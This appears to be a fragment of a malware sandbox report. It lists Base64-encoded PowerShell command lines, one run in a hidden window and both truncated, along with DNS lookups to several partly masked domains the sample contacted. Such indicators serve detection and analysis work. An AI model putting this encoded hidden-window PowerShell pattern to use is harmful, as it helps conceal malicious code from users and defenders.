Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAVABoAHQAaQBnAGQAcQByAHIAcAB0AHUAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AUAB4AHEAdQBkAHkAawB0ACAAIwA+ACAAJABKAHAAZQBrAHMAdwBoAHAAPQAnAEEAcABtAGcAZABwA...
- DNS ASK se####karakas.com
- DNS ASK te##.##ibakkendine.com
- DNS ASK de#.##ecipart.com
- DNS ASK te###stack.com
- DNS ASK bl##.#egaxis.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAVABoAHQAaQBnAGQAcQByAHIAcAB0AHUAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AUAB4AHEAdQBkAHkAawB0ACAAIwA+ACAAJABKAHAAZQBrAHMAdwBoAHAAPQAnAEEAcABtAGcAZABwA...' (with hidden window)